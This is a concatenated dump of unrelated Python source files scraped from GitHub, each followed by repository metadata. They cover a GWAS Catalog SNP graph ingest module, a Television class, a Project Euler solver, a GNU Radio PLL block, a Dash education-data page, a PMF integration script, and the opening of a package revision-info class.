chrom_positions = re.split(r';\\s?', chrom_pos)\n context_list = re.split(r';\\s?', context)\n mapped_genes = re.split(r';\\s?', mapped_gene)\n snp_curies = list()\n\n for index, snp in enumerate(snp_labels):\n snp_curie, snp_type = self._get_curie_and_type_from_id(snp)\n if snp_type is None:\n # make blank node\n snp_curie = self.make_id(snp, \"_\")\n\n graph.addTriple(hap_id, self.globaltt['has_variant_part'], snp_curie)\n snp_curies.append(snp_curie)\n\n # courtesy http://stackoverflow.com/a/16720915\n length = len(snp_labels)\n if not all(len(lst) == length\n for lst in [chrom_nums, chrom_positions, context_list]):\n logger.warning(\n \"Unexpected data field for haplotype {} \\n \"\n \"will not add snp details\".format(hap_label))\n return\n\n variant_in_gene_count = 0\n for index, snp_curie in enumerate(snp_curies):\n self._add_snp_to_graph(\n snp_curie, snp_labels[index], chrom_nums[index],\n chrom_positions[index], context_list[index])\n\n if len(mapped_genes) == len(snp_labels):\n so_class = self.resolve(context_list[index])\n # removed the '+' for recursive one-or-more rdfs:subClassOf paths\n # just so it did not return an empty graph \n so_query = \"\"\"\nSELECT ?variant_label\n WHERE {{\n {0} rdfs:subClassOf {1} ;\n rdfs:label ?variant_label .\n }}\n \"\"\".format(so_class, self.globaltt['gene_variant'])\n\n query_result = so_ontology.query(so_query)\n\n if len(list(query_result)) == 1:\n gene_id = DipperUtil.get_ncbi_id_from_symbol(mapped_genes[index])\n\n if gene_id is not None:\n geno.addAffectedLocus(snp_curie, gene_id)\n geno.addAffectedLocus(hap_id, gene_id)\n variant_in_gene_count += 1\n\n gene_id = DipperUtil.get_ncbi_id_from_symbol(mapped_genes[index])\n if gene_id is not None:\n graph.addTriple(\n snp_curie, self.resolve(context_list[index]), gene_id)\n\n else:\n logger.warning(\n \"More mapped genes than snps, cannot disambiguate for {}\"\n .format(hap_label))\n\n # Seperate in case we want to apply a different relation\n # If not this is redundant with triples added above\n if len(mapped_genes) == variant_in_gene_count and len(set(mapped_genes)) == 1:\n gene_id = DipperUtil.get_ncbi_id_from_symbol(mapped_genes[0])\n geno.addAffectedLocus(hap_id, gene_id)\n\n return\n\n def _add_snp_to_graph(\n self, snp_id, snp_label, chrom_num, chrom_pos, context,\n risk_allele_frequency=None):\n\n if self.testMode:\n graph = self.testgraph\n else:\n graph = self.graph\n model = Model(graph)\n\n if chrom_num != '' and chrom_pos != '':\n location = self._make_location_curie(chrom_num, chrom_pos)\n if location not in self.id_location_map:\n self.id_location_map[location] = set()\n else:\n location = None\n\n alteration = re.search(r'-(.*)$', snp_id)\n if alteration is not None and re.match(r'[ATGC]', alteration.group(1)):\n # add variation to snp\n pass # TODO\n\n if location is not None:\n self.id_location_map[location].add(snp_id)\n\n # create the chromosome\n chrom_id = makeChromID(chrom_num, self.localtt['reference assembly'], 'CHR')\n\n # add the feature to the graph\n snp_description = None\n if risk_allele_frequency is not None\\\n and risk_allele_frequency != ''\\\n and risk_allele_frequency != 'NR':\n snp_description = str(risk_allele_frequency) + ' [risk allele frequency]'\n\n feat = Feature(\n graph, snp_id, snp_label.strip(), self.globaltt['SNP'], snp_description)\n if chrom_num != '' and chrom_pos != '':\n feat.addFeatureStartLocation(chrom_pos, chrom_id)\n feat.addFeatureEndLocation(chrom_pos, chrom_id)\n feat.addFeatureToGraph()\n feat.addTaxonToFeature(self.globaltt['Homo sapiens'])\n # TODO consider adding allele frequency as property;\n # but would need background info to do that\n\n # also want to add other descriptive info about\n # the variant from the context\n for c in re.split(r';', context):\n c = c.strip()\n cid = self.resolve(c, False)\n if cid != c:\n model.addType(snp_id, cid)\n\n return\n\n def _add_deprecated_snp(\n self, snp_id, snp_id_current, merged, chrom_num, chrom_pos):\n if self.testMode:\n graph = self.testgraph\n else:\n graph = self.graph\n model = Model(graph)\n location = self._make_location_curie(chrom_num, chrom_pos)\n # add deprecation information\n if merged == '1' and str(snp_id_current.strip()) != '':\n # get the current rs_id\n current_rs_id = 'dbSNP:'\n if not re.match(r'rs', snp_id_current):\n current_rs_id += 'rs'\n current_rs_id += str(snp_id_current)\n if location is not None:\n if location not in self.id_location_map:\n self.id_location_map[location] = set(current_rs_id)\n else:\n self.id_location_map[location].add(current_rs_id)\n model.addDeprecatedIndividual(snp_id, current_rs_id)\n # TODO check on this\n # should we add the annotations to the current\n # or orig?\n model.makeLeader(current_rs_id)\n else:\n model.makeLeader(snp_id)\n\n def _add_snp_gene_relation(\n self, snp_id, snp_gene_nums, upstream_gene_num, downstream_gene_num):\n if self.testMode:\n graph = self.testgraph\n else:\n graph = self.graph\n geno = Genotype(graph)\n # add the feature as a sequence alteration\n # affecting various genes\n # note that intronic variations don't necessarily list\n # the genes such as for rs10448080 FIXME\n if snp_gene_nums != '':\n for geneid in re.split(r',', snp_gene_nums):\n geneid = geneid.strip()\n # still have to test for this,\n # because sometimes there's a leading comma\n if geneid != '':\n geno.addAffectedLocus(snp_id, 'NCBIGene:' + geneid)\n\n # add the up and downstream genes if they are available\n if upstream_gene_num != '':\n downstream_gene_id = 'NCBIGene:' + downstream_gene_num\n graph.addTriple(\n snp_id, self.globaltt['is upstream of sequence of'], downstream_gene_id)\n if downstream_gene_num != '':\n upstream_gene_id = 'NCBIGene:' + upstream_gene_num\n graph.addTriple(\n snp_id, self.globaltt['is downstream of sequence of'], upstream_gene_id)\n\n def _add_variant_trait_association(\n self, variant_id, mapped_trait_uri, efo_ontology, pubmed_id,\n description=None):\n if self.testMode:\n graph = self.testgraph\n else:\n graph = self.graph\n model = Model(graph)\n # make associations to the EFO terms; there can be >1\n if mapped_trait_uri.strip() != '':\n for trait in re.split(r',', mapped_trait_uri):\n trait = trait.strip()\n\n trait_curie = trait.replace(\"http://www.ebi.ac.uk/efo/EFO_\", \"EFO:\")\n\n phenotype_query = \"\"\"\n SELECT ?trait\n WHERE {{\n <{0}> rdfs:subClassOf+ .\n <{0}> rdfs:label ?trait .\n }}\n \"\"\".format(trait)\n\n query_result = efo_ontology.query(phenotype_query)\n if len(list(query_result)) > 0:\n if re.match(r'^EFO', trait_curie):\n model.addClassToGraph(\n trait_curie, list(query_result)[0][0],\n self.globaltt['Phenotype'])\n\n pubmed_curie = 'PMID:' + pubmed_id\n\n ref = Reference(\n graph, pubmed_curie, self.globaltt['journal article'])\n ref.addRefToGraph()\n\n assoc = G2PAssoc(\n graph, self.name, variant_id, trait_curie,\n model.globaltt['contributes to condition'])\n assoc.add_source(pubmed_curie)\n\n assoc.add_evidence(\n self.globaltt['combinatorial evidence used in automatic assertion'])\n\n if description is not None:\n assoc.set_description(description)\n\n # FIXME score should get added to provenance/study\n # assoc.set_score(pvalue)\n if trait_curie is not None:\n assoc.add_association_to_graph()\n\n @staticmethod\n def _make_location_curie(chrom_num, chrom_pos):\n return 'chr' + str(chrom_num) + ':' + str(chrom_pos)\n\n @staticmethod\n def _make_description(\n disease_or_trait, initial_sample_description, replicate_sample_description,\n platform_with_snps_passing_qc, pvalue):\n description = 'A study of '+disease_or_trait+' in '+initial_sample_description\n if replicate_sample_description != '':\n description = ' '.join(\n (description, 'with', replicate_sample_description))\n if platform_with_snps_passing_qc != '':\n description = ' '.join(\n (description, 'on platform', platform_with_snps_passing_qc))\n description = ' '.join((description, '(p=' + pvalue + ')'))\n return description\n\n @staticmethod\n def _get_curie_and_type_from_id(variant_id):\n \"\"\"\n Given a variant id, our best guess at its curie\n and type (snp, haplotype, etc)\n None will be used for both curie and type\n for IDs that we can't process\n :param variant_id:\n :return:\n \"\"\"\n curie = None\n variant_type = None\n\n # remove space before hyphens\n variant_id = re.sub(r' -', '-', variant_id)\n if re.search(r' x ', variant_id) or re.search(r',', variant_id):\n # TODO deal with rs1234 x rs234... (haplotypes?)\n logger.warning(\"Cannot parse variant groups of this format: %s\", variant_id)\n elif re.search(r';', variant_id):\n curie = ':haplotype_' + Source.hash_id(variant_id)\n variant_type = \"haplotype\"\n elif re.match(r'rs', variant_id):\n curie = 'dbSNP:' + variant_id.strip()\n curie = re.sub(r'-.*$', '', curie).strip()\n variant_type = \"snp\"\n # remove the alteration\n elif re.match(r'kgp', variant_id):\n # http://www.1000genomes.org/faq/what-are-kgp-identifiers\n curie = ':kgp-' + variant_id.strip()\n variant_type = \"snp\"\n elif re.match(r'chr', variant_id):\n # like: chr10:106180121-G\n #\n variant_id = re.sub(r'-?', '-N', variant_id)\n variant_id = re.sub(r' ', '', variant_id)\n curie = ':gwas-' + re.sub(r':', '-', variant_id.strip())\n variant_type = \"snp\"\n elif variant_id.strip() == '':\n pass\n else:\n logger.warning(\"There's a snp id i can't manage: %s\", variant_id)\n\n return curie, variant_type\n","repo_name":"alexgarciac/dipper","sub_path":"dipper/sources/GWASCatalog.py","file_name":"GWASCatalog.py","file_ext":"py","file_size_in_byte":21601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"52"} +{"seq_id":"1476792546","text":"class Television:\n \"\"\"\n A class representing details for a television object.\n \"\"\"\n MIN_CHANNEL = 0 # Minimum TV channel\n MAX_CHANNEL = 3 # Maximum TV channel\n\n MIN_VOLUME = 0 # Minimum TV volume\n MAX_VOLUME = 2 # Maximum TV volume\n\n def __init__(self) -> None:\n \"\"\"\n Contstructor to create initial state for television object.\n Creates private variables for channel, volume, and power state.\n Channel and volume variables are initialized at the minimum value, power is set to be off (0).\n \"\"\"\n self.__channel = Television.MIN_CHANNEL\n self.__volume = Television.MIN_VOLUME\n self.__on = 0\n\n def power(self) -> None:\n \"\"\"\n Method to toggle the power state of the television object.\n Sets the power to on (1) if off (0), and off if on.\n \"\"\"\n if self.__on == 1:\n self.__on = 0\n else:\n self.__on = 1\n\n def channel_up(self) -> None:\n \"\"\"\n Method to increase the channel value of the television object by 1.\n Increasing the value while at the max value will cycle the channel back to the min value.\n \"\"\"\n if self.__on == 1:\n if self.__channel + 1 > Television.MAX_CHANNEL:\n self.__channel = Television.MIN_CHANNEL\n else:\n self.__channel += 1\n\n def channel_down(self) -> None:\n \"\"\"\n Method to decrease the channel value of the television object by 1.\n Decreasing the value while at the min value will cycle the channel back to the max value.\n \"\"\"\n if self.__on == 1:\n if self.__channel - 1 < Television.MIN_CHANNEL:\n self.__channel = Television.MAX_CHANNEL\n else:\n self.__channel -= 1\n\n def volume_up(self) -> None:\n \"\"\"\n Method to increase the volume value of the television object by 1.\n Increasing the value while at the max value will cause no change.\n \"\"\"\n if self.__on == 1:\n if self.__volume + 1 <= Television.MAX_VOLUME:\n self.__volume += 1\n\n def volume_down(self) -> None:\n \"\"\"\n Method to decrease the volume value of the television object by 1.\n Decreasing the value while at the min value will cause no change.\n \"\"\"\n if self.__on == 1:\n if self.__volume - 1 >= Television.MIN_VOLUME:\n self.__volume -= 1\n\n def __str__(self) -> str:\n \"\"\"\n Method to retrieve the power, channel, and volume status of the television object.\n :return: Power state (True/False), channel number, and volume number.\n \"\"\"\n power_status = ''\n if self.__on:\n power_status = 'True'\n else:\n power_status = 'False'\n status = 'TV status: Is on = {}, Channel = {}, Volume = {}'\n return status.format(power_status, self.__channel, self.__volume)\n","repo_name":"KianuB/lab","sub_path":"classes.py","file_name":"classes.py","file_ext":"py","file_size_in_byte":2978,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"27872799349","text":"\"\"\"Largest prime factor\nProblem:The prime factors of 13195 are 5, 7, 13 and 29.\n\nWhat is the largest prime factor of the number 600851475143 ?\n\"\"\"\ndef is_prime(num):\n if num <= 3:\n if num <= 1:\n return False\n return True\n \n if not num%2 or not num%3:\n return False\n \n for i in xrange(5, int(num**0.5) + 1, 6):\n if not num%i or not num%(i + 2):\n return False\n return True\n\ndef get_largest_prime(value):\n for x in range(1, int(value**0.5)):\n if not value%x and is_prime(x):\n yield x\n\n\nif __name__=='__main__':\n print('test 13195')\n test = list(get_largest_prime(13195))\n assert test[-1]==29,'The largest prime of 13195, should be 29, got [%s]' % test\n print(test)\n print('Pass Test')\n\n print('largest prime factor of number 600851475143')\n value = list(get_largest_prime(600851475143))\n print(value)\n","repo_name":"Shaunwei/ProjectEuler","sub_path":"problem3.py","file_name":"problem3.py","file_ext":"py","file_size_in_byte":911,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"33078371860","text":"from floodsystem.stationdata import build_station_list\nfrom floodsystem.station import MonitoringStation\n\ndef run():\n \"\"\"Requirements for Task 1F\"\"\"\n\n # Build list of stations\n stations = build_station_list()\n rivers_sorted = MonitoringStation.inconsistent_typical_range_stations(stations)\n print(f\"number of stations with inconsistent data: {len(rivers_sorted)}\")\n print(f\"stations with inconsistent data: {rivers_sorted}\")\n\n\n\nif __name__ == \"__main__\":\n print(\"*** Task 1F: CUED Part IA Flood Warning System ***\")\n run()\n\n","repo_name":"emmamunday/flood-risk-project","sub_path":"Task1F.py","file_name":"Task1F.py","file_ext":"py","file_size_in_byte":548,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"20652831456","text":"import numpy as np\nfrom gnuradio import gr, digital\n\nclass blk(gr.sync_block): # other base classes are basic_block, decim_block, interp_block\n \"\"\"\n Decision Directed PLL - Decision Directed based carrier recovery pll\n\n Parameters:\n bw - Loop Bandwith (default = 2*pi/100)\n damp - Loop Damping (default = 1.0)\n const - Slicer Constellation (default = BPSK)\n \"\"\"\n\n def __init__(self, bw=0.0628, damp=1.0, const=digital.bpsk_constellation()): # only default arguments here\n \"\"\"arguments to this function show up as parameters in GRC\"\"\"\n gr.sync_block.__init__(\n self,\n name='Decision Directed PLL', # will show up in GRC\n in_sig=[np.complex64],\n out_sig=[np.complex64, np.float32]\n )\n self.bw = bw\n self.damp = damp\n\n self.phase = 0\n self.freq = 0\n self.prevgains = [0,0]\n self.slicer_const = const.points()\n\n self.denom = (len(self.slicer_const) + 2 * self.damp * self.bw + self.bw * self.bw)\n self.alpha = (4 * self.damp * self.bw) / self.denom\n self.beta = (4 * self.bw * self.bw) / self.denom\n\n def Decision(self, symbol):\n return self.slicer_const[np.argmin(np.abs(self.slicer_const - symbol))]\n\n def updateGains(self):\n self.denom = (len(self.slicer_const) + 2 * self.damp * self.bw + self.bw * self.bw) \n self.alpha = (4 * self.damp * self.bw) / self.denom\n self.beta = (4 * self.bw * self.bw) / self.denom\n self.phase = 0\n self.freq = 0\n\n def work(self, input_items, output_items):\n inputs = input_items[0]\n outputs = output_items[0]\n errors = output_items[1]\n\n if(self.prevgains[0] != self.bw or self.prevgains[1] != self.damp):\n self.prevgains = [self.bw*1, self.damp*1]\n self.updateGains()\n\n for i in range(len(inputs)):\n out = inputs[i] * np.exp(-1j*self.phase)\n error = (out * np.conj(self.Decision(out))).imag\n self.freq += self.beta * error\n self.phase += self.freq + self.alpha * error\n self.phase = (np.pi + self.phase) % (2*np.pi) - np.pi\n outputs[i] = out\n errors[i] = error\n return len(outputs)\n","repo_name":"Paulo-D2000/Gr-DDPLL","sub_path":"Block.py","file_name":"Block.py","file_ext":"py","file_size_in_byte":2276,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"52"} +{"seq_id":"10618267970","text":"import dash\nfrom dash import dash_table as dt\nimport plotly.graph_objs as go\nimport plotly.express as px\nfrom dash import html, dcc, Input, Output, callback\nimport pandas as pd\n\n# Crear la aplicación Dash\n\ndash.register_page(__name__, name='Municipio')\ntitle = 'Municipio'\n\n# Cargar tus datos desde un archivo (asegúrate de tener un archivo 'Data.xlsx' en el mismo directorio)\ndf = pd.read_excel('Data.xlsx')\n\n# Agrega un Dropdown para seleccionar el año\nlayout = html.Div([\n html.Div([\n html.H1('ANUIES DASH'),\n html.Img(src='assets/municipios.png')\n ], className='banner'),\n\n html.Div([\n html.Div([\n html.Div([\n html.H3('Estados de México', style={\n 'margin-bottom': '8px', 'color': 'black'}),\n ])\n ], className='create_container1 four columns', id=\"title\"),\n ], id=\"header\", className=\"row flex-display\", style={'margin-bottom': \"25px\"}),\n\n # Drop down list (Estado) para mostrar sus municipios correspondientes\n html.Div([\n html.Div([\n html.P('Selecciona el estado', className='fix_label',\n style={'color': 'black', 'text-align': 'center'}),\n dcc.Dropdown(\n id='select_estados',\n multi=False,\n clearable=True,\n disabled=False,\n style={'display': True},\n value='AGUASCALIENTES',\n placeholder='Selecciona Estado',\n options=[{'label': c, 'value': c}\n for c in df['ENTIDAD_FEDERATIVA'].unique()],\n className=\"dcc_compon\"\n ),\n\n # Agrega un Dropdown para seleccionar el año\n html.P('Selecciona el año', className='fix_label',\n style={'color': 'black', 'text-align': 'center'}),\n dcc.Dropdown(\n id='select_anio',\n multi=False,\n clearable=True,\n disabled=False,\n style={'display': True},\n value=2022, # Ajusta esto según tus años reales en el DataFrame\n placeholder='Selecciona Año',\n options=[{'label': anio, 'value': anio}\n for anio in df['Año'].unique()],\n className=\"dcc_compon\"\n )\n ], className='create_container1 four columns', style={'margin-bottom': '8px'})\n ], className=\"row flex-display\"),\n\n # Data Table\n html.Div([\n html.Div([\n dt.DataTable(\n id='my_datatable',\n columns=[{'name': c, 'id': c} for c in df.columns],\n page_current=0,\n page_size=10,\n page_action='custom',\n ),\n ], className='create_container2 thirteen columns'),\n ], className='row flex-display'),\n\n # Gráfico de Barras con la Suma de Variables por Municipio\n html.Div([\n html.Br(),\n dcc.Graph(id='bar_chartM',\n config={'displayModeBar': 'hover'})\n ], className='create_container2 thirteen columns'),\n\n # Gráfico Lineal con la Suma de Variables por Municipio\n html.Div([\n html.Br(),\n dcc.Graph(id='line_chartM',\n config={'displayModeBar': 'hover'})\n ], className='create_container2 thirteen columns'),\n\n # Crear los gráficos de pastel en grupos de dos\n html.Div([\n # Primera fila de gráficos de pastel\n html.Div([\n html.Br(),\n dcc.Graph(id='pie_chartM', config={'displayModeBar': 'hover'}),\n html.Br(),\n\n dcc.Graph(id='pie_chartM1', config={'displayModeBar': 'hover'}),\n ],className='create_containes seven columns'),\n html.Br(),\n\n # Segunda fila de gráficos de pastel\n html.Div([\n html.Br(),\n dcc.Graph(id='pie_chartM2', config={'displayModeBar': 'hover'}),\n html.Br(),\n\n dcc.Graph(id='pie_chartM3', config={'displayModeBar': 'hover'}),\n ], className='create_container six columns'),\n\n # Tercera fila de gráficos de pastel\n html.Div([\n html.Br(),\n dcc.Graph(id='pie_chartM4', config={'displayModeBar': 'hover'}),\n html.Br(),\n\n dcc.Graph(id='pie_chartM5', config={'displayModeBar': 'hover'}),\n ], className='create_container five columns'),\n ], className='row flex-display'),\n\n])\n\n# Actualiza tus callbacks para incluir el año seleccionado\n@callback(\n [Output('my_datatable', 'data'),\n Output('bar_chartM', 'figure'),\n Output('line_chartM', 'figure'),\n Output('pie_chartM', 'figure'),\n Output('pie_chartM1', 'figure'),\n Output('pie_chartM2', 'figure'),\n Output('pie_chartM3', 'figure'),\n Output('pie_chartM4', 'figure'),\n Output('pie_chartM5', 'figure')],\n [Input('select_estados', 'value'), Input('select_anio', 'value')]\n)\ndef update_data(select_estados, select_anio):\n # Filtra los datos según el estado y el año seleccionados\n filtered_data = df[(df['ENTIDAD_FEDERATIVA'] == select_estados)\n & (df['Año'] == select_anio)]\n\n # Actualiza la Data Table\n data_table = filtered_data.to_dict('records')\n\n # Variables a mostrar en los gráficos\n variables = ['Lugares_Ofertados', 'Solicitudes_de_Primer_Ingreso', 'Primer_Ingreso_Total',\n 'Matrícula_Total', 'Egresados_Total', 'Titulados_Total']\n\n # Calcula la suma de cada variable por municipio\n variable_sums = filtered_data.groupby('MUNICIPIO')[variables].sum().reset_index()\n\n bar_data = []\n line_data = []\n\n for variable in variables:\n # Gráfico de Barras\n bar_data.append(\n go.Bar(\n x=variable_sums['MUNICIPIO'],\n y=variable_sums[variable],\n name=variable,\n text=variable_sums[variable],\n textposition='inside'\n )\n )\n\n # Gráfico Lineal\n line_data.append(\n go.Scatter(\n x=variable_sums['MUNICIPIO'],\n y=variable_sums[variable],\n mode='lines+markers',\n name=variable,\n text=variable_sums[variable],\n textposition='top center'\n )\n )\n\n bar_fig = go.Figure(data=bar_data)\n bar_fig.update_layout(\n barmode='group',\n title=f'Suma de Variables por Municipio de {select_estados}',\n xaxis_title='Municipio',\n yaxis_title='Suma',\n yaxis=dict(title=\"Suma\")\n )\n\n line_fig = go.Figure(data=line_data)\n line_fig.update_layout(\n title=f'Suma de Variables por Municipio de {select_estados} (Gráfico Lineal)',\n xaxis_title='Municipio',\n yaxis_title='Suma'\n )\n\n # Crear gráficos de pastel con Plotly Express para todas las variables\n pie_data_variables = []\n\n for variable in variables:\n # Modifica el título del gráfico de pastel\n pie_title = f'Distribución de {variable} en {select_estados}'\n pie_data = px.pie(filtered_data, names='MUNICIPIO', values=variable, title=pie_title)\n pie_data_variables.append(pie_data)\n\n pie_chartM = pie_data_variables[0]\n pie_chartM1 = pie_data_variables[1]\n pie_chartM2 = pie_data_variables[2]\n pie_chartM3 = pie_data_variables[3]\n pie_chartM4 = pie_data_variables[4]\n pie_chartM5 = pie_data_variables[5]\n\n return data_table, bar_fig, line_fig, pie_chartM, pie_chartM1, pie_chartM2, pie_chartM3, pie_chartM4, pie_chartM5\n\n\n","repo_name":"sergiopechtorres/APP-DASH-WEB","sub_path":"pages/Municipio.py","file_name":"Municipio.py","file_ext":"py","file_size_in_byte":7583,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"22441848150","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Feb 10 22:23:14 2020\n\n@author: Arriën Symon Rauh\n\"\"\"\nimport os\nimport OsTools3 as ot\nimport sys\nimport argparse\nimport pandas as pd\nimport numpy as np\n#import scipy as sp\nimport matplotlib.pyplot as plt\nimport math\n\n\ndistances = [2.5 , 2.55, 2.6 , 2.65, 2.7 , 2.75, 2.8 , 2.85, 2.9 , 2.95, 3.0 ,\n 3.1 , 3.2 , 3.3 , 3.4 , 3.5 , 3.6 , 3.7 , 3.8 , 3.9 , 4.0 , 4.2 ,\n 4.4 , 4.6 , 4.8 , 5.0]\n\ndef read_data(data_file):\n \"\"\"\n \"\"\"\n data = pd.read_csv(data_file, sep='\\t')\n return data\n\n\ndef blocked(forces, nblocks):\n \"\"\"\n Performs block avaeraging.\n\n Parameters\n ----------\n forces : dataFrame\n The data to calcluate an average over.\n nblocks : integer\n Number of blocks to separate the data into.\n \"\"\"\n size = len(forces)/nblocks\n blocks = []\n for block in range(nblocks):\n a = []\n for ts in forces[int(block*size):int((block+1)*size)]:\n a.append(ts)\n blocks.append(np.average(a))\n blockaverage = np.average(blocks)\n blockstd = np.std(blocks)\n blockvar = np.var(blocks)\n return nblocks, size, blockaverage, blockstd, blockvar\n\n\ndef deltaG_off(pmf):\n \n dGoff = pmf.min() - pmf[pmf.argmin():].max()\n \n return dGoff\n\n\n\ndef mean_force_dist(forces, r):\n \"\"\"\n Extract the mean force\n \"\"\"\n # Calculate mean per distance\n F_mean = blocked(forces, 100)[2]#-np.average(forces)\n # Estimate the error htrough block averaging *NEEDS CHECKING*\n F_mean_error = blocked(forces, 100)[3]# Block averaging\n return [r, F_mean, F_mean_error]\n\n\ndef mean_force(data):\n \"\"\"\n \"\"\"\n # Calculate mean per distance\n mean_force_per_distance = []\n for r in np.sort(data.com_dist.unique()):\n forces_r = data.loc[data['com_dist'] == r, 'force']\n mean_force_per_distance.append(mean_force_dist(forces_r, r))\n# print(r, mean_force_per_distance[-1][0])\n return mean_force_per_distance\n\n\ndef mf_w_entropy_corr(mf,kB,T):\n \"\"\"\n Performs entropy correction.\n \"\"\"\n mf_corr = []\n for d in mf:\n mf_corr.append([d[0],d[1]+(2.0*T*kB/d[0]),d[2]])\n return mf_corr\n\ndef calculate_pmf(mf,mf_corr):\n \"\"\"\n Calculates the PMF by numerically integrating the mean force.\n \"\"\"\n pmf_of_d = []\n # Weights??\n w = []\n\n for d in mf:\n pmf_of_d.append([d[0],0.0,0.0])\n w.append(0.0)\n\n pmf_of_d[-1][1] = 0.0\n for i in reversed(range(len(mf_corr)-1)):\n # Weights to acconut for distance between COM-constraints\n hh = 0.5*(mf[i+1][0]-mf[i][0])\n #\n pmf_of_d[i][1] = pmf_of_d[i+1][1] - hh*(mf_corr[i+1][1]+mf_corr[i][1])\n# print(pmf_of_d[i][1], \" = \", pmf_of_d[i+1][1],\" - \" , hh*(mf_corr[i+1][1]+mf_corr[i][1]))\n\n w[i] += hh\n w[i+1] += hh\n\n pmf_of_d[-1][2] = 0.0\n# print(w, mf_corr)\n var_int = math.pow(w[-1]*mf_corr[-1][2],2)\n\n for i in reversed(range(len(mf_corr)-1)):\n hh = 0.5*(mf[i+1][0]-mf[i][0])\n pmf_of_d[i][2] = var_int + math.pow(hh*mf_corr[i][2],2)\n var_int += math.pow(w[i]*mf_corr[i][2],2)\n\n for i in range(len(pmf_of_d)):\n pmf_of_d[i][2] = math.sqrt(pmf_of_d[i][2])\n\n return pmf_of_d\n\n\ndef output_pmf(pmf, output_file):\n \"\"\"\n \"\"\"\n pmf.to_csv(output_file, sep='\\t', index=False, float_format='%.7f')\n # with open(output_file,'w') as of:\n # for i in range(0,len(pmf)):\n # of.write(F\"{pmf[i,0]}'\\t'{pmf[i,1]}'\\t'{pmf[i,2]}\\n\")\n\n\ndef plot_pmf(pmf, png_file):\n \"\"\"\n \"\"\"\n plt.plot(pmf[:,0],pmf[:,1])\n plt.xlabel(\"COM distance (nm)\")\n plt.ylabel(r\"PMF (F $(kJ mol^{-1})$\")\n plt.title(F\"{png_file.split('.')[-2].split('/')[-1].replace('_', ' ')}\")\n plt.savefig(png_file, dpi=300)\n plt.close()\n\n\ndef constraint_force_integration(data_file, output_file, png_file, ret=False):\n \"\"\"\n Perfoms the constraint force integration.\n \"\"\"\n if type(data_file) == type(pd.DataFrame()):\n data = data_file\n elif os.path.isfile(data_file):\n data = read_data(data_file)\n try:\n # Calculate mean force for every distance\n mean_forces = mean_force(data)\n except NameError:\n print(\"Data Error: data input needs to be checked.\")\n sys.exit(1)\n # Definitions of constants\n kB = 8.31451e-3\n T = 303\n # Calculate correction of mean forces\n mf_corr = mf_w_entropy_corr(mean_forces,kB,T)\n # Calculate the PMF\n pmf = np.array(calculate_pmf(mean_forces,mf_corr))\n df_pmf = pd.DataFrame({'com_dist':pmf[:,0], 'pmf':pmf[:,1], 'error':pmf[:,2]})\n\n # Check output directory\n if not os.path.isdir(ot.file_path(output_file)):\n os.makedirs(ot.file_path(output_file))\n # Write PMF data to file\n output_pmf(df_pmf, output_file)\n # Write plot to file\n if png_file:\n plot_pmf(pmf, png_file)\n if ret:\n return df_pmf\n\n\ndef main(data_file, output_file, png_file):\n \"\"\"\n \"\"\"\n constraint_force_integration(data_file, output_file, png_file)\n\n\n#############MAIN##############\nif __name__ == \"__main__\":\n \"Do the work\"\n # Parse command line arguments\n parser = argparse.ArgumentParser(description=\n '''This script prodcues a PMF from pull\n forces''')\n parser.add_argument(\"-i\", \"--data_file\", help=\"\", required=True)\n parser.add_argument(\"-o\", \"--output_file\", help=\"\", required=False)\n parser.add_argument(\"-p\", \"--plot_pmf\", dest=\"plot_pmf\", action=\"store_true\",\n help='''For including a plot of the pmf''')\n\n args = parser.parse_args()\n data_file = args.data_file\n output_file = args.output_file\n png_file = args.plot_pmf\n\n main(data_file, output_file, png_file)\n\n","repo_name":"ASRauh/research1","sub_path":"constraint_force_integration.py","file_name":"constraint_force_integration.py","file_ext":"py","file_size_in_byte":5819,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"13018780925","text":"import hashlib\nimport json\n\nimport archive_info\nimport error\nimport package_info\nimport packages_info\n\n\nFIELD_PACKAGE_NAME = 'package_name'\nFIELD_REVISION = 'revision'\nFIELD_PACKAGE_TARGETS = 'package_targets'\n\nFIELD_REVISION_HASH = 'revision_hash'\n\n\nclass RevisionInfo(object):\n \"\"\"Revision information object describing a set revision for a package.\"\"\"\n def __init__(self, packages_desc, revision_file=None):\n \"\"\"Constructor for a RevisionInfo object.\n\n Args:\n packages_desc: Packages description containing all the necessary packages\n and package targets to verify a revision file is complete.\n revision_file: Optional JSON file representing a RevisionInfo object.\n \"\"\"\n assert isinstance(packages_desc, packages_info.PackagesInfo)\n self._packages_desc = packages_desc\n self._revision_num = None\n self._package_name = None\n\n # A revision describes all the package_info's for each package target.\n # Every package target in the package_desc must have its revision set\n # for the revision info to be valid.\n self._package_targets = {}\n\n if revision_file is not None:\n self.LoadRevisionFile(revision_file)\n\n def __eq__(self, other):\n return (type(self) == type(other) and\n self._revision_num == other._revision_num and\n self._package_name == other._package_name and\n self._package_targets == other._package_targets)\n\n def _GetRevisionHash(self):\n \"\"\"Returns a stable hash for a revision file for validation purposes.\"\"\"\n hash_string = str(self._revision_num)\n hash_string += str(self._package_name)\n for package_target in sorted(self._package_targets):\n package_desc = self._package_targets[package_target]\n archive_list = package_desc.GetArchiveList()\n\n hash_string += str(package_target)\n for archive in archive_list:\n for field, member in archive.GetArchiveData()._asdict().iteritems():\n hash_string += '[%s:%s]' % (field, member)\n\n return hashlib.sha1(hash_string).hexdigest()\n\n def _ValidateRevisionComplete(self):\n \"\"\"Validate packages to make sure it matches the packages description.\"\"\"\n if self._package_name is None:\n raise error.Error('Invalid revision information - '\n 'no package name.')\n elif self._revision_num is None:\n raise error.Error('Invalid revision information - '\n 'no revision identifier')\n\n package_targets = self._packages_desc.GetPackageTargetsForPackage(\n self._package_name\n )\n\n if package_targets:\n package_targets = set(package_targets)\n revision_targets = set(self._package_targets.keys())\n\n if package_targets != revision_targets:\n raise error.Error('Invalid revision information - '\n 'target mismatch:'\n + '\\n%s:' % self._package_name\n + '\\n Required Target Packages:'\n + 